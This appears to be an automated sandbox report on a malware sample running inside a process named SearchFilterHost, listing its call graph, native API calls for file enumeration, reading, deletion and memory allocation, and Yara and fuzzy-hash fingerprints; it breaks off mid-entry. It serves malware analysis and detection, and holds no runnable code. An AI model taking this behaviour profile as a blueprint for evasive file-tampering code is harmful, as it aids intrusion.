99459 32a20a6 99458->99459 99462 32b92a0 99459->99462 99461 32a20bb 99463 32b932c 99462->99463 99465 32b92c8 99462->99465 99467 51b2e80 LdrInitializeThunk 99463->99467 99464 32b935d 99464->99461 99465->99461 99467->99464 99468 32b9170 99469 32b9198 99468->99469 99470 32b91e4 99468->99470 99471 32b91fa NtDeleteFile 99470->99471 99477 32bc430 99478 32bb2d0 RtlFreeHeap 99477->99478 99479 32bc445 99478->99479 99480 3299bb6 99481 3299bb7 99480->99481 99481->99481 99483 3299b78 99481->99483 99487 3299bbb 99481->99487 99482 3299bb0 99483->99482 99484 3299b9d CreateThread 99483->99484 99485 329a2b2 99487->99485 99488 32baf30 99487->99488 99489 32baf56 99488->99489 99494 3294160 99489->99494 99491 32baf62 99492 32baf9b 99491->99492 99497 32b54b0 99491->99497 99492->99485 99501 32a2ff0 99494->99501 99496 329416d 99496->99491 99498 32b5511 99497->99498 99500 32b551e 99498->99500 99512 32a1790 99498->99512 99500->99492 99502 32a300d 99501->99502 99504 32a3026 99502->99504 99505 32b9c60 99502->99505 99504->99496 99506 32b9c7a 99505->99506 99507 32b9ca9 99506->99507 99508 32b8870 LdrInitializeThunk 99506->99508 99507->99504 99509 32b9d09 99508->99509 99510 32bb2d0 RtlFreeHeap 99509->99510 99511 32b9d22 99510->99511 99511->99504 99513 32a17cb 99512->99513 99528 32a7c90 99513->99528 99515 32a17d3 99516 32bb3b0 RtlAllocateHeap 99515->99516 99526 32a1ab3 99515->99526 99517 32a17e9 99516->99517 99518 32bb3b0 RtlAllocateHeap 99517->99518 99519 32a17fa 99518->99519 99520 32bb3b0 RtlAllocateHeap 99519->99520 99521 32a180b 99520->99521 99527 32a18ab 99521->99527 99543 32a67f0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99521->99543 99523 32a4330 LdrLoadDll 99524 32a1a62 99523->99524 99539 32b7df0 99524->99539 99526->99500 99527->99523 99529 32a7cbc 99528->99529 99530 32a7b80 2 API calls 99529->99530 99531 32a7cdf 99530->99531 99532 32a7ce9 99531->99532 99534 32a7d01 99531->99534 99535 32b9210 NtClose 99532->99535 99536 32a7cf4 99532->99536 99533 32a7d1d 99533->99515 99534->99533 99537 32b9210 NtClose 99534->99537 99535->99536 99536->99515 99538 32a7d13 99537->99538 99538->99515 99540 32b7e52 99539->99540 99542 32b7e5f 99540->99542 99544 32a1ad0 99540->99544 99542->99526 99543->99527 99547 32a1af0 99544->99547 99563 32a7f60 99544->99563 99546 32a2059 99546->99542 99547->99546 99567 32b0f80 99547->99567 99550 32a1d0a 99552 32bc500 2 API calls 99550->99552 99551 32a1b4e 99551->99546 99570 32bc3d0 99551->99570 99555 32a1d1f 99552->99555 99553 32a7f00 LdrInitializeThunk 99558 32a1d72 99553->99558 99556 32a1ebc 99555->99556 99555->99558 99575 32b5540 99555->99575 99579 32a0690 99556->99579 99558->99546 99558->99553 99560 32b5540 PostThreadMessageW 99558->99560 99561 32a0690 LdrInitializeThunk 99558->99561 99559 32a7f00 LdrInitializeThunk 99562 32a1ec6 99559->99562 99560->99558 99561->99558 99562->99558 99562->99559 99564 32a7f6d 99563->99564 99565 32a7f8e SetErrorMode 99564->99565 99566 32a7f95 99564->99566 99565->99566 99566->99547 99568 32bb240 NtAllocateVirtualMemory 99567->99568 99569 32b0fa1 99568->99569 99569->99551 99571 32bc3e0 99570->99571 99572 32bc3e6 99570->99572 99571->99550 99573 32bb3b0 RtlAllocateHeap 99572->99573 99574 32bc40c 99573->99574 99574->99550 99576 32b55a2 99575->99576 99578 32b55c3 99576->99578 99582 32a5a20 99576->99582 99578->99555 99589 32b9490 99579->99589 99583 32a5a36 99582->99583 99584 32a5bb3 99583->99584 99587 32a0c6b PostThreadMessageW 99583->99587 99584->99578 99588 32a0c7d 99587->99588 99588->99578 99590 32b94ad 99589->99590 99593 51b2c70 LdrInitializeThunk 99590->99593 99591 32a06b2 99591->99562 99593->99591 99594 32a2548 99595 32a6090 2 API calls 99594->99595 99596 32a2573 99595->99596 99597 32a6f40 99598 32a6f5c 99597->99598 99606 32a6faf 99597->99606 99600 32b9210 NtClose 99598->99600 99598->99606 99599 32a70e7 99601 32a6f77 99600->99601 99607 32a6320 NtClose LdrInitializeThunk LdrInitializeThunk 99601->99607 99603 32a70c1 99603->99599 99609 32a64f0 NtClose LdrInitializeThunk LdrInitializeThunk 99603->99609 99606->99599 99608 32a6320 NtClose LdrInitializeThunk LdrInitializeThunk 99606->99608 99607->99606 99608->99603 99609->99599 99615 32b15c0 99616 32b15dc 99615->99616 99617 32b1618 99616->99617 99618 32b1604 99616->99618 99620 32b9210 NtClose 99617->99620 99619 32b9210 NtClose 99618->99619 99621 32b160d 99619->99621 99622 32b1621 99620->99622 99625 32bb3f0 RtlAllocateHeap 99622->99625 99624 32b162c 99625->99624 99627 32b9080 99628 32b9121 99627->99628 99630 32b90a5 99627->99630 99629 32b9137 NtReadFile 99628->99629 99631 329b390 99632 32bb240 NtAllocateVirtualMemory 99631->99632 99633 329ca01 99632->99633 99634 32ac410 99636 32ac439 99634->99636 99635 32ac53d 99636->99635 99637 32ac4e3 FindFirstFileW 99636->99637 99637->99635 99639 32ac4fe 99637->99639 99638 32ac524 FindNextFileW 99638->99639 99640 32ac536 FindClose 99638->99640 99639->99638 99640->99635 99643 32a5a16 99644 32a59ae 99643->99644 99645 32a7f00 LdrInitializeThunk 99644->99645 99646 32a59c0 99645->99646 99648 32a59ec 99646->99648 99649 32a7e80 99646->99649 99650 32a7ec4 99649->99650 99651 32a7ee5 99650->99651 99656 32b8540 99650->99656 99651->99646 99653 32a7ed5 99654 32a7ef1 99653->99654 99655 32b9210 NtClose 99653->99655 99654->99646 99655->99651 99657 32b85ba 99656->99657 99659 32b8568 99656->99659 99661 51b4650 LdrInitializeThunk 99657->99661 99658 32b85df 99658->99653 99659->99653 99661->99658

                                                                                                  Executed Functions

                                                                                                  Function 03299BC0 Relevance: 14.1, Strings: 11, Instructions: 373COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 370 3299bc0-3299e90 371 3299ea1-3299eaa 370->371 372 3299e92-3299e9b 370->372 373 3299eac-3299eb5 371->373 374 3299ec2-3299ed3 371->374 372->371 375 3299ec0 373->375 376 3299eb7-3299eba 373->376 377 3299ee4-3299ef0 374->377 375->372 376->375 378 3299ef2-3299f05 377->378 379 3299f07 377->379 378->377 380 3299f0e-3299f27 379->380 380->380 382 3299f29-3299f33 380->382 383 3299f44-3299f4d 382->383 384 3299f4f-3299f62 383->384 385 3299f64-3299f6b 383->385 384->383 386 3299f6d-3299f9c 385->386 387 3299f9e-3299fb7 385->387 386->385 387->387 389 3299fb9 387->389 390 3299fc0-3299fc9 389->390 391 3299fcf-3299fd9 390->391 392 329a272-329a27c 390->392 394 3299fea-3299ff6 391->394 393 329a28d-329a296 392->393 395 329a298-329a2a2 393->395 396 329a2a4-329a2ab 393->396 397 3299ff8-329a004 394->397 398 329a014-329a01b 394->398 395->393 400 329a2ad call 32baf30 396->400 401 329a2ec-329a2f6 396->401 402 329a012 397->402 403 329a006-329a00c 397->403 399 329a026-329a02d 398->399 405 329a058-329a062 399->405 406 329a02f-329a056 399->406 414 329a2b2-329a2bc 400->414 407 329a307-329a310 401->407 402->394 403->402 411 329a073-329a07f 405->411 406->399 412 329a312-329a322 407->412 413 329a324-329a32d 407->413 417 329a081-329a093 411->417 418 329a095-329a0a8 411->418 412->407 415 329a2cd-329a2d9 414->415 415->401 419 329a2db-329a2ea 415->419 417->411 421 329a0b9-329a0c3 418->421 419->415 423 329a0d3-329a0e2 421->423 424 329a0c5-329a0d1 421->424 426 329a0e8-329a0ef 423->426 427 329a18e-329a192 423->427 424->421 430 329a0f1-329a107 426->430 431 329a114-329a11b 426->431 428 329a1bb-329a1c5 427->428 429 329a194-329a1b9 427->429 434 329a1d6-329a1e2 428->434 429->427 435 329a109-329a10f 430->435 436 329a112 430->436 432 329a14d-329a157 431->432 433 329a11d-329a14b 431->433 437 329a168-329a171 432->437 433->431 438 329a1f9-329a1fd 434->438 439 329a1e4-329a1f7 434->439 435->436 436->426 442 329a189 437->442 443 329a173-329a17c 437->443 440 329a1ff-329a21c 438->440 441 329a21e-329a228 438->441 439->434 440->438 445 329a239-329a245 441->445 442->392 446 329a17e-329a181 443->446 447 329a187 443->447 448 329a263-329a26d 445->448 449 329a247-329a253 445->449 446->447 447->437 448->390 451 329a261 449->451 452 329a255-329a25b 449->452 451->445 452->451
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (8$0k$I$J$N$O$V|$[D$`$fx${P
                                                                                                  • API String ID: 0-2758441814
                                                                                                  • Opcode ID: 7cd1060c287b55fb3b41efe73a10322d22aa5cc6aecdf875300a3dc055a4dd12
                                                                                                  • Instruction ID: a27f5bed75465ed30f5cbbddfd6e7376a627e20a6bb79bd6c1e278017e120d37
                                                                                                  • Opcode Fuzzy Hash: 7cd1060c287b55fb3b41efe73a10322d22aa5cc6aecdf875300a3dc055a4dd12
                                                                                                  • Instruction Fuzzy Hash: B0128CB0D16229CBEF24CF44C994BEDBBB2BB44308F1082DAD5096B290D7B56AC5CF55
                                                                                                  Function 032AC410 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 032AC4F4
                                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 032AC52F
                                                                                                  • FindClose.KERNELBASE(?), ref: 032AC53A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 3541575487-0
                                                                                                  • Opcode ID: 9b1775c0694cab9b5ac375888c13b0b91da9880a664cfacdd9c2bf0ef09938c8
                                                                                                  • Instruction ID: 464ab5b680905cb1e7f844190b6eff9aeb798981a47cab92af96831e907ec7fa
                                                                                                  • Opcode Fuzzy Hash: 9b1775c0694cab9b5ac375888c13b0b91da9880a664cfacdd9c2bf0ef09938c8
                                                                                                  • Instruction Fuzzy Hash: BF3192B5920719BBDB20DB64CC85FEF777CAB44744F144498B909BB180DAB0BAC48BA0
                                                                                                  Function 032B8F20 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtCreateFile.NTDLL(A35ADC33,0000006A,?,?,?,?,?,?,?,?,?), ref: 032B9018
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 823142352-0
                                                                                                  • Opcode ID: c801b236e75bb4bc9b37aa594bff612af0ec2f3c0d3abe5d97e1b87ca7553daf
                                                                                                  • Instruction ID: a127aef86997a414de0fd6da5f064bb338331ae67349d6b2c1bd60555966201d
                                                                                                  • Opcode Fuzzy Hash: c801b236e75bb4bc9b37aa594bff612af0ec2f3c0d3abe5d97e1b87ca7553daf
                                                                                                  • Instruction Fuzzy Hash: EA31D3B5A10208AFDB14DF98D880EEEB7F9AF8C314F108209FD19A7340D770A951CBA5
                                                                                                  Function 032B9080 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtReadFile.NTDLL(A35ADC33,0000006A,?,?,?,?,?,?,?), ref: 032B9160
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2738559852-0
                                                                                                  • Opcode ID: 2f68a037fb149db10700f6fbf5e475ea70ead0067214abf062199d4d96e50e10
                                                                                                  • Instruction ID: b91603d3a6ba5b393949337c8c64305c22a99b459262b00dad22247ba04d3c95
                                                                                                  • Opcode Fuzzy Hash: 2f68a037fb149db10700f6fbf5e475ea70ead0067214abf062199d4d96e50e10
                                                                                                  • Instruction Fuzzy Hash: 4731C5B9A10208AFDB14DF99D881EEEB7B9AF88714F108109FD19A7240D770A9518BA5
                                                                                                  Function 032B9370 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtAllocateVirtualMemory.NTDLL(A35ADC33,?,032B7E5F,00000000,00000004,00003000,?,?,?,?,?,032B7E5F,032A1B4E,032A1B4E,00000000,?), ref: 032B9432
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2167126740-0
                                                                                                  • Opcode ID: e4fc71308b37eb257a6d272c665e276b1514e9313c5a1f372fd8819a6de134d6
                                                                                                  • Instruction ID: a043deed21322c34b241edaa33c9fe503a6f22e2c4e5c14e028ccd27a5e5a515
                                                                                                  • Opcode Fuzzy Hash: e4fc71308b37eb257a6d272c665e276b1514e9313c5a1f372fd8819a6de134d6
                                                                                                  • Instruction Fuzzy Hash: 7421FBB9A10209AFDB14DF59DC81EEFB7B9EF88350F10810AFD18A7240D770A951CBA5
                                                                                                  Function 032B9170 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtDeleteFile.NTDLL(A35ADC33), ref: 032B9203
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DeleteFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 4033686569-0
                                                                                                  • Opcode ID: e43d69b4d04ca0b690ebcb19fc35979828dbbe6c1bf827c20973be6f74474864
                                                                                                  • Instruction ID: 1a633cc6cb85f2301eec994176da2ce020ad7fca3f10599992588adc0c4ac1b7
                                                                                                  • Opcode Fuzzy Hash: e43d69b4d04ca0b690ebcb19fc35979828dbbe6c1bf827c20973be6f74474864
                                                                                                  • Instruction Fuzzy Hash: EF119E75A20704BFD620EB68DC41FEBB3BCEF84354F008149F918AB280D7B07A5187A1
                                                                                                  Function 032B9210 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 032B9247
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 3535843008-0
                                                                                                  • Opcode ID: 8c432eb5109c663c6e388c646d9d9885cabc588ea9dd12fc9b3944e72242aa06
                                                                                                  • Instruction ID: 3a5da2db606fa9618d26bb9ae006effc46b74f8c47513b0b05686199d7c46c06
                                                                                                  • Opcode Fuzzy Hash: 8c432eb5109c663c6e388c646d9d9885cabc588ea9dd12fc9b3944e72242aa06
                                                                                                  • Instruction Fuzzy Hash: EAE0463A200304BBD620EA5ADC40FDB77ACDFCA764F108019FA18AB281D6B1B91186E1
                                                                                                  Function 051B4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: a3411ce606e4bd15a7abbda555f5bc2930054268dc7f32a5cb7010aee3d34c30
                                                                                                  • Instruction ID: 485ad035680643a4ba071cc20a329087387643a2c35f1b5550aac81c31d38c5f
                                                                                                  • Opcode Fuzzy Hash: a3411ce606e4bd15a7abbda555f5bc2930054268dc7f32a5cb7010aee3d34c30
                                                                                                  • Instruction Fuzzy Hash: 2790026260150052414071594984406641597F13013D5C159A0555570C871EC9559269
                                                                                                  Function 051B4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 17af443fd9df6162a91efe1dee09cace9bef44a40d3f543caca315556c6a254f
                                                                                                  • Instruction ID: 0191f6cd157c60f01c0b5259472713fcc9c1e33a1ba34a0bd5b50548cb5d2fd6
                                                                                                  • Opcode Fuzzy Hash: 17af443fd9df6162a91efe1dee09cace9bef44a40d3f543caca315556c6a254f
                                                                                                  • Instruction Fuzzy Hash: 8B900232605800229140715949C4546441597F0301B95C055E0425564C8B1ACA565361
                                                                                                  Function 051B2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 8e9e0bdcca44ea6e5a9ad430d55eb690051d7537e333c723b25e9ba731a6d575
                                                                                                  • Instruction ID: 49ebc2c64e4096b25627e9d33ccba44b87ef1cb6475b413280e42b5dc56b2313
                                                                                                  • Opcode Fuzzy Hash: 8e9e0bdcca44ea6e5a9ad430d55eb690051d7537e333c723b25e9ba731a6d575
                                                                                                  • Instruction Fuzzy Hash: E190022A21340012D1807159558860A041587E1202FD5D459A0016568CCA1BC9695321
                                                                                                  Function 051B2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: e04597e9a2d48e3b4d9849d8e4eec3bccf9cb912b4d4af8d2476660ec869d76f
                                                                                                  • Instruction ID: 4e7bc24930d83db509b331d1d782f3c9ebdc43828ee3226d207d84e3d4adddf7
                                                                                                  • Opcode Fuzzy Hash: e04597e9a2d48e3b4d9849d8e4eec3bccf9cb912b4d4af8d2476660ec869d76f
                                                                                                  • Instruction Fuzzy Hash: 8890022230140013D140715955986064415D7F1301F95D055E0415564CDA1BC9565222
                                                                                                  Function 051B2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 2a086f9cbce46c405510365bb9cadf0c732cf068cb3913b65e5c7c3a6d0027eb
                                                                                                  • Instruction ID: 3ae8dca53eee0f16665fce7788aafde979c302985092267a211f8f8311538a9d
                                                                                                  • Opcode Fuzzy Hash: 2a086f9cbce46c405510365bb9cadf0c732cf068cb3913b65e5c7c3a6d0027eb
                                                                                                  • Instruction Fuzzy Hash: 74900222242441625545B1594584507441697F02417D5C056A1415960C862BD956D621
                                                                                                  Function 051B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 4f9e77feb749c784d16da5db7f6b7c70f4b352ccdde87e73e02f5974f7e48e6a
                                                                                                  • Instruction ID: 6c21a61a3f12153eb1227cf09e48664a9413109bd6bf121a12930b313eb28933
                                                                                                  • Opcode Fuzzy Hash: 4f9e77feb749c784d16da5db7f6b7c70f4b352ccdde87e73e02f5974f7e48e6a
                                                                                                  • Instruction Fuzzy Hash: 7990023220140423D11171594684707041987E0241FD5C456A0425568D975BCA52A121
                                                                                                  Function 051B2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 1256b6f4babf04b30b1456a56b9244472f9db8ba3051488e93c402e95f6aa6c7
                                                                                                  • Instruction ID: b193a2082265c6a88b351e93cc318d687a5513e404cb78341244b3af4c7c51dd
                                                                                                  • Opcode Fuzzy Hash: 1256b6f4babf04b30b1456a56b9244472f9db8ba3051488e93c402e95f6aa6c7
                                                                                                  • Instruction Fuzzy Hash: 3790023220148812D1107159858474A041587E0301F99C455A4425668D879BC9917121
                                                                                                  Function 051B2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: c7af1810de10abe7d4c44801dcd6d99a7ebd60ad5eaf8adbf2ab11a1826c5aac
                                                                                                  • Instruction ID: a00563737943f05525a6b9e937ee71da35bc841e1fdd81a5efe4dd8525bbf075
                                                                                                  • Opcode Fuzzy Hash: c7af1810de10abe7d4c44801dcd6d99a7ebd60ad5eaf8adbf2ab11a1826c5aac
                                                                                                  • Instruction Fuzzy Hash: CD90023220140852D10071594584B46041587F0301F95C05AA0125664D871BC9517521
                                                                                                  Function 051B2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 742fcd8ad42f5ab503ad98db5a645503cdb2131af9447d025e28f20d03ec6cd5
                                                                                                  • Instruction ID: 89a988aa9ce33d51264b14a572b84c85ea25f7b5c348e60a3d754d0fd405a05c
